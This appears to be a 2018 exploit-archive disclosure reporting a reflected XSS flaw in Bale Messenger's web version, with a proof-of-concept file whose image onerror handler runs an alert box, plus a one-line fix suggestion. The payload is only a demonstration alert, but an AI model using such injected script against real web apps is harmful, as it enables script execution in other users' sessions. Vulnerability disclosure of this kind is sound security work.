[+] Exploit Title ; Bale Messenger Web Version XSS ( Reflected ) Vulnerability
[+] Date : 2018-07-13
[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : https://bale.ai/
[+] Dork : N/A
[+] My Site : http://4rtxtnk7o5yt3mfw.onion/
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Description :
[!] Bale is An extremely powerful and popular instant messenger
[!] Bale Has three versions of the desktop - Web and mobile.
[!] More than 100,000 users use it in Iran You can Download it from App Store And bazar
[+] Poc :
[+] Video :
[!] https://youtu.be/z3ZnDPct72U
[!] Copy the payload code and save in the xml Or xss format.
[!] Payload :
<html>
<note>
<to>Mafia Boys</to>
<from>0P3N3R</from>
<heading>0P3N3R WAS HERE! Tnx : Ebrahim Vaker</heading>
<body><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img></body>
</note>
</html>
[+] Security Level :
[!] Low
[+] Exploitation Technique:
[!] LOCAL
[+] Request Method :
[!] POST
[+] Vulnerability Files :
[!] Index
[+] Fix :
[!] Restrict user input or replace bad characters
[+] We Are : [+] 0P3N3R [+] Ebrahim_Vaker